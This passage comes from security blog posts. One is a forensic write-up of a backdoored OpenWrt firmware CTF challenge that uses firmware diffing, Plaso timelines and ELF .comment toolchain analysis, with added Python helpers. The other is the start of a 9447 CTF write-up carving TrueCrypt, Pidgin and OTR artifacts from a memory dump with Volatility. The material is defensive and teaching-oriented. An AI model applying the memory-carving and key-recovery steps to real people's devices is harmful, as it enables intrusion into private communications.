src="http://4.bp.blogspot.com/-cUbwigQTadU/VNGae467RBI/AAAAAAAAA10/jotqrVy69n8/s1600/diff.png" width="400" /></a></div><br />The LZMA'd Kernel (offset 0x8F8) is the same on both images, even though binwally reports a difference.
This happens because binwalk extraction doesn't know where the kernel ends, so both extracted files also contain trailing data such as the SquashFS partition, and that trailing data is what differs.<br /><br />The backdoor located at "/bin/nc" is a simple shell script that checks the MD5 of "/etc/profile" and draws a Nyan Cat along with the challenge key. In order to get the proper key, we simply modify the file location to the relative path "./etc/banner", to avoid overlapping with the file from the original system.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-dRoI4tlRbBU/VNGWxRY8ozI/AAAAAAAAA1o/e_ynv4FitRI/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://2.bp.blogspot.com/-dRoI4tlRbBU/VNGWxRY8ozI/AAAAAAAAA1o/e_ynv4FitRI/s1600/backdoor.png" width="400" /></a></div><br />After running the file, we get the key NCNdeadb6adec4c77a40c23e04770924d3c5b18face.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-J3BLu5nzoiU/VNGWaKt1TmI/AAAAAAAAA1g/EMriC_TrL-c/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-J3BLu5nzoiU/VNGWaKt1TmI/AAAAAAAAA1g/EMriC_TrL-c/s1600/flag.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>This was just too easy, right? But what if we didn't have a known template for comparison?<br /><br /><b><br /></b><b>Timeline Analysis</b><br /><b><br /></b>My tool of choice to perform timeline analysis is <a href="http://plaso.kiddaland.net/">Plaso</a>, created by <a href="https://twitter.com/el_killerdwarf">@el_killerdwarf</a>. The tool is python-based, modular and very fast. What I like most about it is the ease of outputting results to <a href="http://www.elasticsearch.org/overview/elkdownloads/">ELK</a>.
If you don't know about Plaso and the ELK stack, read this <a href="http://blog.kiddaland.net/2013/11/visualize-output.html">quick tutorial</a> and <a href="http://plaso.kiddaland.net/developer/building-the-tool/linux">set up your environment</a>.<br /><br />Let's use <a href="http://plaso.kiddaland.net/usage/log2timeline">log2timeline</a> to create a dump file, pointing it at the extracted SquashFS path:<br /><br /><div class="code">log2timeline.py output.dump squashfs-root/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-uOj5n0gzNQo/VNQquHmXOZI/AAAAAAAAA2E/z9oFPiuL8gM/s1600/Screenshot-Terminal-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://4.bp.blogspot.com/-uOj5n0gzNQo/VNQquHmXOZI/AAAAAAAAA2E/z9oFPiuL8gM/s1600/Screenshot-Terminal-8.png" width="400" /></a></div><br />Let's fire up psort with the elastic output module to push the timeline into Elasticsearch:<br /><br /><div class="code">psort.py -o elastic output.dump</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-d8ot3TRL1TM/VNQqyGXbGNI/AAAAAAAAA2M/EWsKW1Ga0ig/s1600/Screenshot-Terminal-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://3.bp.blogspot.com/-d8ot3TRL1TM/VNQqyGXbGNI/AAAAAAAAA2M/EWsKW1Ga0ig/s1600/Screenshot-Terminal-9.png" width="400" /></a></div><br />That's all: Plaso uses the <a href="https://github.com/log2timeline/plaso/blob/master/plaso/parsers/filestat.py">filestat</a> parser to extract metadata from the files, outputting the results to Elasticsearch.<br /><br />We already identified the following dates from the firmware:<br /><br /><ul><li>03 February 2007 (??:??:??): BinHeader firmware creation date</li><li>03 February 2007 (13:16:08): Linux Kernel compile date</li><li>29 October 2014 (16:53:25): SquashFS creation or last append time</li></ul><br />First let's filter the
filesystem attributes: we just want to display the mtime (modified) timestamp, so we run a micro analysis on the timestamp_desc field and include that value. The filter should be something like this: must | field timestamp_desc | query: "mtime".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-88Wi4gS4Ckk/VNQsRTSt3iI/AAAAAAAAA2Y/sdpAc4_SRjQ/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-88Wi4gS4Ckk/VNQsRTSt3iI/AAAAAAAAA2Y/sdpAc4_SRjQ/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox.png" width="640" /></a></div><br />The histogram view is very helpful to get the big picture of what's going on:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eOjg7Y4IXFw/VNQsahsFKRI/AAAAAAAAA2g/SK_LeRqSBHk/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="http://1.bp.blogspot.com/-eOjg7Y4IXFw/VNQsahsFKRI/AAAAAAAAA2g/SK_LeRqSBHk/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-2.png" width="640" /></a></div><br />We can clearly see that the files added/modified on 2014-10-29 are the malicious ones: every legitimate file carries the 2007 build date, so anything newer than the kernel build is a suspect.
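<br /><br />The same cross-check, without Plaso, as an added example that is not part of the original post: walk the unsquashed tree, collect each file's mtime (SquashFS inodes carry only that one timestamp; atime/ctime on the extracted tree are set by the extraction itself), bucket the events per day like the Kibana histogram, and report every file modified after the kernel build time taken from the version string above. The sample tree is constructed in a temporary directory for the example; the reference date is the kernel compile date from the page.<br /><br />

```python
"""Quick file-system timeline of an extracted firmware root.

Added example, not part of the original post and not Plaso (its filestat
parser does this collection at scale). Flags files whose mtime postdates
the kernel build; the sample tree is constructed here for illustration.
"""
import os
import tempfile
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Kernel compile date from the version string (page value); reference for "too new"
KERNEL_BUILD = datetime(2007, 2, 3, 13, 16, 8, tzinfo=timezone.utc)


def fs_timeline(root: str) -> List[Tuple[datetime, str]]:
    """(mtime, path relative to root) for every file under root, oldest first.
    SquashFS stores a single timestamp per inode (mtime), so that is the only
    one worth reading from an unsquashed tree."""
    events = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            mtime = datetime.fromtimestamp(os.lstat(full).st_mtime, tz=timezone.utc)
            events.append((mtime, os.path.relpath(full, root)))
    events.sort()
    return events


def histogram_by_day(events: List[Tuple[datetime, str]]) -> Dict[str, int]:
    """Events per calendar day, the textual equivalent of the Kibana histogram."""
    counts: Dict[str, int] = {}
    for when, _path in events:
        day = when.strftime("%Y-%m-%d")
        counts[day] = counts.get(day, 0) + 1
    return counts


def modified_after(events: List[Tuple[datetime, str]], reference: datetime) -> List[str]:
    """Paths touched after the reference build time. In a vendor image every
    file carries the build date, so later mtimes are the suspects."""
    return [path for when, path in events if when > reference]


def build_sample_tree() -> str:
    """Constructed stand-in for an unsquashed OpenWrt root: base files dated at
    the 2007 kernel build, two files re-touched on 2014-10-29 as in the
    backdoored image discussed above. Returns the temporary root path."""
    root = tempfile.mkdtemp(prefix="squashfs-root-")
    base = KERNEL_BUILD.timestamp()
    later = datetime(2014, 10, 29, 16, 53, 25, tzinfo=timezone.utc).timestamp()
    sample = {"etc/banner": base, "bin/busybox": base, "etc/init.d/rcS": base,
              "etc/profile": later, "bin/nc": later}
    for rel, stamp in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as handle:
            handle.write(b"#!/bin/sh\n")
        os.utime(path, (stamp, stamp))       # set atime and mtime explicitly
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    timeline = fs_timeline(target)
    for when, path in timeline:
        print(when.isoformat(), path)
    print("per day:", histogram_by_day(timeline))
    print("newer than kernel build:", modified_after(timeline, KERNEL_BUILD))
```

Point it at a real squashfs-root/ as the first argument. Like the Plaso output, this only narrows the search: an attacker who rebuilds with the Image Builder can just as easily reset mtimes, so a clean histogram is not proof of a clean image.<br /><br />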
The <strike>state sponsored</strike> attacker did not modify other files from the OpenWRT base image.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-0SOvG5dP_qQ/VNQsxqjxzpI/AAAAAAAAA2o/25VqJ8e8qBo/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="http://2.bp.blogspot.com/-0SOvG5dP_qQ/VNQsxqjxzpI/AAAAAAAAA2o/25VqJ8e8qBo/s1600/Screenshot-Kibana%2B3%2B-%2BPlaso%2B-%2BMozilla%2BFirefox-1.png" width="640" /></a></div><br />At this point it is pretty clear that the firmware was modified using the <a href="https://downloads.openwrt.org/whiterussian/0.9/">OpenWRT Image Builder</a>, a pre-compiled OpenWrt build environment. The BinHeader and the kernel timestamps were left untouched and the only partition modified was the SquashFS one.<br /><br />Of course these timestamps, like any kind of metadata, could have been tampered with by the attacker. However, they are very helpful during the initial phases, speeding up investigations and narrowing the analysis down to a smaller set of data.<br /><br /><b>ELF Structural Information</b><br /><br />I'm always impressed when AV vendors <a href="http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/">manage to profile APT and state-sponsored attackers</a> based on PE timestamps. Techniques like <a href="https://www.mandiant.com/blog/tracking-malware-import-hashing/">imphash</a> are usually applied only to Windows binaries.<br /><br />PE imports are the functions that a piece of software calls from other files (typically DLLs). 
To track these imports, a hash is created from the library/API names and their specific order within the executable. Because of the way a PE's import table is generated, the imphash value can be used to identify related malware samples, for example.<br /><br />Everybody does that for Windows binaries, but what about Linux? VirusTotal recently <a href="http://blog.virustotal.com/2014/11/virustotal-detailed-elf-information.html">added detailed ELF information to their engine</a>. We can also use these sections to extract useful information from the binaries, including the toolchain used to compile them.<br /><br />We usually don't have any timestamp information in the ELF sections, but there are many other interesting fields. This <a href="http://reverse.lostrealm.com/protect/strip.html">quick guide on using strip</a> summarizes some of them:<br /><br /><blockquote class="tr_bq"><span style="font-family: Arial, Helvetica, sans-serif;"><i>When an executable is produced from source code, there are two stages - compilation and linking. Compiling takes a source file and produces an object file. Linking concatenates these object files into a single executable. The concatenation occurs by section. For example, the .comment section for the final executable will contain the contents of the .comment section of each object file that was linked into the executable.</i></span></blockquote><blockquote class="tr_bq"><span style="font-family: Arial, Helvetica, sans-serif;"><i>If we examine the contents of the .comment section we can see the compiler used, plus the version of the compiler</i></span></blockquote>It's pretty simple to read and parse the .comment section of ELF files. <a href="https://www.gnu.org/software/binutils/">GNU readelf</a> (part of binutils) and <a href="https://github.com/eliben/pyelftools">pyelftools</a> include all the functions needed to parse it. 
<br /><br />I always try to display information from object files using different toolchains in order to find out which one understands the file structure properly. In this specific case I'm going to use mipsel-linux-gnu-readelf (part of the <a href="http://www.emdebian.org/">Emdebian</a> toolchain), but the regular readelf also does the job.<br /><br /><div class="code">find . -type f | while read -r i ; do echo "$i" ; mipsel-linux-gnu-readelf -p .comment "$i" ; done &gt; comment-section.txt</div><div class="code">./lib/modules/2.4.30/diag.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-adm.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-robo.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/switch-core.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br /><br />./lib/modules/2.4.30/wlcompat.o<br /><br />String dump of section '.comment':<br />&nbsp; [ &nbsp; &nbsp; 1] &nbsp;GCC: (GNU) 3.4.4 (OpenWrt-1.0)</div><br />Only a few ELF files kept the .comment section; the others were stripped during the compilation/linking phase. 
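<br /><br />readelf is enough for a single firmware, but when the whole tree has to be compared, or two firmware versions diffed as with tfat.ko further below, it helps to have the parsing in a script. The Python code below is an added example and not part of the original post or of pyelftools: it walks the ELF section header table by hand (ELF32 and ELF64, both byte orders, so it copes with mipsel router binaries), returns the NUL-separated strings of .comment, flags the files whose toolchain banner differs from the rest of the tree, and reports lines that appear or disappear between two builds. build_sample_elf() produces a constructed minimal ELF32/MIPS image as a fixture, not a real kernel module.

```python
import struct
from collections import Counter
from typing import Dict, List

SHT_NULL, SHT_PROGBITS, SHT_STRTAB, SHT_NOBITS = 0, 1, 3, 8


def elf_sections(data: bytes) -> Dict[str, bytes]:
    """Map section name -> raw bytes by walking the section header table.

    Handles ELFCLASS32/64 and both byte orders; a fully stripped object
    (no section table at all) yields an empty dict.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    end = "<" if ei_data == 1 else ">"            # EI_DATA: 1 = LSB, 2 = MSB
    if ei_class == 1:                             # ELFCLASS32 (mipsel routers)
        ehdr_fmt, shdr_fmt = "HHIIIIIHHHHHH", "IIIIIIIIII"
    elif ei_class == 2:                           # ELFCLASS64
        ehdr_fmt, shdr_fmt = "HHIQQQIHHHHHH", "IIQQQQIIQQ"
    else:
        raise ValueError("unknown EI_CLASS %d" % ei_class)
    eh = struct.unpack_from(end + ehdr_fmt, data, 16)
    e_shoff, e_shentsize, e_shnum, e_shstrndx = eh[5], eh[10], eh[11], eh[12]
    if e_shoff == 0 or e_shnum == 0:
        return {}
    # Field order is the same in both classes: name, type, flags, addr, offset, size, ...
    hdrs = [struct.unpack_from(end + shdr_fmt, data, e_shoff + i * e_shentsize)
            for i in range(e_shnum)]
    strtab_hdr = hdrs[e_shstrndx]
    shstrtab = data[strtab_hdr[4]:strtab_hdr[4] + strtab_hdr[5]]
    sections = {}
    for name_off, sh_type, _flags, _addr, offset, size, *_rest in hdrs:
        name = shstrtab[name_off:shstrtab.index(b"\0", name_off)].decode("ascii", "replace")
        if name and sh_type not in (SHT_NULL, SHT_NOBITS):
            sections[name] = data[offset:offset + size]
    return sections


def elf_comment_strings(data: bytes) -> List[str]:
    """The strings 'readelf -p .comment' prints: one banner per object linked in."""
    raw = elf_sections(data).get(".comment", b"")
    return [s.decode("ascii", "replace") for s in raw.split(b"\0") if s]


def toolchain_report(images: Dict[str, bytes]) -> Dict[str, List[str]]:
    """path -> .comment strings; stripped files map to an empty list."""
    return {path: elf_comment_strings(blob) for path, blob in images.items()}


def odd_ones_out(report: Dict[str, List[str]]) -> List[str]:
    """Files whose toolchain signature is not the most common one in the tree:
    a different compiler, or a .comment section where everything else is stripped."""
    signature = {path: tuple(sorted(set(lines))) for path, lines in report.items()}
    majority = Counter(signature.values()).most_common(1)[0][0]
    return sorted(path for path, sig in signature.items() if sig != majority)


def comment_diff(old: Dict[str, List[str]], new: Dict[str, List[str]]) -> Dict[str, Dict[str, List[str]]]:
    """Per-file .comment lines added/removed between two firmware versions."""
    changes = {}
    for path in sorted(set(old) | set(new)):
        before, after = set(old.get(path, [])), set(new.get(path, []))
        if before != after:
            changes[path] = {"added": sorted(after - before), "removed": sorted(before - after)}
    return changes


def build_sample_elf(comments: List[bytes]) -> bytes:
    """Constructed minimal ELF32 little-endian MIPS image holding only a
    .comment section and the section-name string table (fixture, not a real module)."""
    shstrtab = b"\0.comment\0.shstrtab\0"
    comment = b"".join(c + b"\0" for c in comments)
    ehsize, shentsize = 52, 40
    comment_off = ehsize
    shstr_off = comment_off + len(comment)
    shoff = shstr_off + len(shstrtab)
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8      # class32, LSB, version 1
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH",
                                 1, 8, 1, 0, 0, shoff, 0,         # ET_REL, EM_MIPS, version, entry, phoff, shoff, flags
                                 ehsize, 0, 0, shentsize, 3, 2)   # ehsize, phentsize, phnum, shentsize, shnum, shstrndx

    def shdr(name, sh_type, off, size):
        return struct.pack("<IIIIIIIIII", name, sh_type, 0, 0, off, size, 0, 0, 1, 0)

    table = (shdr(0, SHT_NULL, 0, 0) +
             shdr(1, SHT_PROGBITS, comment_off, len(comment)) +
             shdr(10, SHT_STRTAB, shstr_off, len(shstrtab)))
    return ehdr + comment + shstrtab + table


if __name__ == "__main__":
    base = build_sample_elf([b"GCC: (GNU) 3.4.4 (OpenWrt-1.0)"])
    foreign = build_sample_elf([b"GCC: (GNU) 4.2.4", b"GCC: (GNU) 3.3.2"])
    tree = {"lib/modules/2.4.30/diag.o": base, "lib/modules/2.4.30/wlcompat.o": base,
            "usr/sbin/dropped.bin": foreign}   # hypothetical paths
    print("suspicious:", odd_ones_out(toolchain_report(tree)))
```

On a real tree, feed toolchain_report() the bytes of every file that starts with the ELF magic and keep the stripped ones in the report: a single file that still carries .comment in an otherwise stripped firmware is exactly the TheMoon situation described below.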
If we download the OpenWRT 0.9 <a href="https://downloads.openwrt.org/whiterussian/0.9/whiterussian-0.9.tar.bz2">sources</a> we can see that GCC 3.4.4 was indeed used:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ue50lktTw2s/VNZN60HuOfI/AAAAAAAAA3k/9NcdteuTQAw/s1600/gcc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-ue50lktTw2s/VNZN60HuOfI/AAAAAAAAA3k/9NcdteuTQAw/s1600/gcc.png" width="400" /></a></div><br /><a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">The TheMoon worm</a> exploited a command injection to infect Linksys wireless routers with self-replicating malware. If we analyze its .comment section, we can see that it was probably compiled and linked using GCC 4.2.4 and 3.3.2. If we search for a .comment section in the firmware of the E4200 router targeted by the worm, we can't find any, because the vendor's toolchain stripped all of them. A file compiled with a different toolchain than the rest of the firmware, or carrying extra ELF sections that the other files don't have, is highly suspicious.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-T0G9-ifRWmw/VNd98TFG5YI/AAAAAAAAA4E/CzLGZOxrnF8/s1600/moon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="http://1.bp.blogspot.com/-T0G9-ifRWmw/VNd98TFG5YI/AAAAAAAAA4E/CzLGZOxrnF8/s1600/moon.png" width="400" /></a></div><br />Remember that the .comment section of the final executable includes the contents of the .comment section of each object file that was linked into it. 
If we compare the .comment section from the <a href="http://www.asus.com/us/Networking/RTAC87U/HelpDesk_Download/">ASUS RT-AC87U</a> firmwares v3.0.0.4.378.3885 and v3.0.0.4.376.2769, we can spot an extra line in tfat.ko from the newer version:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-luhq_oW7CO8/VNa_7COIYyI/AAAAAAAAA30/XAATpwbulzk/s1600/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="http://2.bp.blogspot.com/-luhq_oW7CO8/VNa_7COIYyI/AAAAAAAAA30/XAATpwbulzk/s1600/compare.png" width="640" /></a></div><br />If you want to dump every section of every ELF file you may use this command line (kind of hacky, but it works):<br /><br /><div class="code">find . -type f | while read -r i ; do echo "$i" ; for j in $(readelf -S "$i" | grep \\[ | cut -d"]" -f2 | cut -d " " -f2 | grep -v "Name") ; do mipsel-linux-gnu-readelf -p "$j" "$i" ; done ; done &gt; list.txt</div><br />The output will be a bit too verbose; you may want to narrow the analysis down to the following sections:<br /><br /><ul><li>.comment - version control information (in practice, the compiler banner of every linked object)</li><li>.modinfo - information about a kernel module (license, vermagic, parameters)</li><li>.notes - comments put there by the compiler/linker toolchain</li><li>.debug - information for symbol debugging</li><li>.interp - the name of the dynamic loader</li></ul><br />For more information on the ELF file structure, check the <a href="http://man7.org/linux/man-pages/man5/elf.5.html">ELF man page</a> and Chapter 5 of <a href="http://www.amazon.com/Malware-Forensics-Field-Guide-Systems/dp/1597494704/">Malware Forensics Field Guide for Linux Systems</a>.<br /><br /><br /><b>Conclusion</b><br /><br />Without further clues or context this information may not be relevant, but in conjunction with other data it helps to get a big picture of what's going on:<br /><br /><ul><li>Diffing the 
content from previous firmwares may be useful to find out when backdoors were first installed, modified and/or removed.</li><li>Artifact timeline creation and analysis also helps to speed up investigations by correlating the vast amount of information found on the system.</li><li>The contents of the ELF sections will likely reveal the toolchain and the compiler version used to build a suspect executable. Clues like this are attribution identifiers, contributing towards identifying the platform the attacker used to craft his code.</li></ul><br />We can use the timestamps from the kernel partition to correlate different firmwares from the same family, for example. We can also compare the timestamps from each partition to find deviations: a firmware header created in 2007, with a kernel timestamp from 2007 and a SquashFS partition dated 2014, is highly suspicious.<br /><br />The <a href="http://firmware.re/">Firmware.RE</a> project is performing large scale analysis, providing a better understanding of the security issues related to firmware. A broader view of firmware is not only beneficial but necessary to discover new vulnerabilities and backdoors, correlating different device families and showing how vulnerabilities reappear across different products. 
This is a really cool project to track how firmwares are evolving and getting security fixes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/vendorexcuses/status/550350987102552064"><img border="0" height="178" src="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA4w/r299fVTRR0w/s1600/tweet2.png" width="400" /></a></div><br />Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br /><b>9447 2014 CTF Write Up: coor coor</b><br />Published 2014-11-30T21:02:00.001-02:00, updated 2014-12-04T20:47:07.160-02:00<br /><br /><div>The Australian <a href="https://9447.plumbing/home">9447 Security Society CTF</a> took place on November 29-30 and it was yet another fun and really professionally organized CTF. I played with my friends from <a href="https://ctftime.org/team/10288">TheGoonies</a> again (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>, right?).</div><br />I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new book I recently bought: <a href="http://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098/">The Art of Memory Forensics</a> (authored by <a href="https://twitter.com/attrc">@attrc</a> and <a href="https://twitter.com/gleeda">@gleeda</a>).<br /><br /><b>Task: coor coor (misc - 400)</b><br /><br /><div class="code">A 9447 CTF organizer is giving away flags to friends that he trusts. This memory dump was taken off a competitor's computer after a raid by the pwnpolice. 
</div><br />Download provided: <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2</a><br /><br />Let's start by identifying the operating system profile (pass the suggested profile to the following commands with --profile if it isn't Volatility's default, WinXPSP2x86):<br /><div class="code">python vol.py -f challenge.vmem imageinfo</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-BjDCXQEPw8U/VHuGqU41qiI/AAAAAAAAAvI/imoT3YXhNi8/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-BjDCXQEPw8U/VHuGqU41qiI/AAAAAAAAAvI/imoT3YXhNi8/s1600/Screenshot-Terminal.png" height="222" width="400" /></a></div><br />Let's take a screenshot to see what the user was doing:<br /><div class="code">python vol.py -f challenge.vmem screenshot -D screenshot/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvQ/LGFfmjrXN3U/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvQ/LGFfmjrXN3U/s1600/session_0.WinSta0.Default.png" height="182" width="320" /></a></div><br />The user was running something inside VirtualBox, let's keep digging:<br /><div class="code">python vol.py -f challenge.vmem psxview</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-c5-t4zuqR8E/VHuJieO2q5I/AAAAAAAAAvc/h8K-9fjt0EY/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-c5-t4zuqR8E/VHuJieO2q5I/AAAAAAAAAvc/h8K-9fjt0EY/s1600/Screenshot-Terminal-1.png" height="320" width="280" /></a></div><div class="code">python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-s-x-h0m7aG8/VHuLJb3DhaI/AAAAAAAAAvs/4oOFiA6LrbA/s1600/xaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-s-x-h0m7aG8/VHuLJb3DhaI/AAAAAAAAAvs/4oOFiA6LrbA/s1600/xaaa.png" height="241" width="400" /></a></div>The user was basically running a VirtualBox machine (business2.vdi) from an encrypted TrueCrypt container (secret.tc). That's why we used psxview to list the system processes earlier. Note that the lower offsets belong to the host and the higher ones (after 0x7b760da0) belong to the guest OS. So what was he doing?<br /><br /><div class="code">python vol.py -f challenge.vmem connscan</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-eRRc_yCUf4E/VHuMpSP7LVI/AAAAAAAAAv4/cnQ_edx2bFU/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-eRRc_yCUf4E/VHuMpSP7LVI/AAAAAAAAAv4/cnQ_edx2bFU/s1600/Screenshot-Terminal-4.png" height="81" width="400" /></a></div><br />The host 54.149.24.114 (yodawg.9447.plumbing) happened to be an IRC server with only one active channel: #9447ctf. 
We can carve some Pidgin logs using foremost:<br /><br /><div class="code">python vol.py -f challenge.vmem mftparser | grep 9447ctf</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-81D-io6GGDs/VHuO5LWFBMI/AAAAAAAAAwM/olsXRTCFVxg/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-81D-io6GGDs/VHuO5LWFBMI/AAAAAAAAAwM/olsXRTCFVxg/s1600/Screenshot-Terminal-5.png" height="165" width="400" /></a></div><div class="code">foremost challenge.vmem</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-gsDBAVKK6lI/VHuOtkoDlbI/AAAAAAAAAwE/TgFJwBIhz8Y/s1600/carve.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-gsDBAVKK6lI/VHuOtkoDlbI/AAAAAAAAAwE/TgFJwBIhz8Y/s1600/carve.png" height="160" width="400" /></a></div><br />Private conversations are not logged by default on Pidgin with the OTR plugin. 
We can see a couple of OTR encrypted messages in the memory dump:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qCvvUDzx7ps/VHuTXUQvxNI/AAAAAAAAAwY/Y9jb0oTfjCA/s1600/hex2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qCvvUDzx7ps/VHuTXUQvxNI/AAAAAAAAAwY/Y9jb0oTfjCA/s1600/hex2.PNG" height="48" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ehjpPb9MjKE/VHuTc1FxcpI/AAAAAAAAAwg/TUY4RBiXzuA/s1600/hex1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ehjpPb9MjKE/VHuTc1FxcpI/AAAAAAAAAwg/TUY4RBiXzuA/s1600/hex1.PNG" height="121" width="400" /></a></div><br />Because of <a href="https://en.wikipedia.org/wiki/Forward_secrecy">perfect forward secrecy</a>, if you lose control of your private key, no previous conversation is compromised. I only had the long-term signature key (<a href="https://gist.github.com/bmaia/a7a2b6e73cd0d9332738">otr.private_key</a>), and that key is never used to encrypt conversations: it only signs the Diffie-Hellman exchange from which the per-session encryption keys are derived. I still needed to retrieve the short-term encryption keys from memory. I got stuck at this phase and spent the whole night trying to figure out how to do that.<br /><br />After a while I decided to get some sleep and keep trying the following day. 
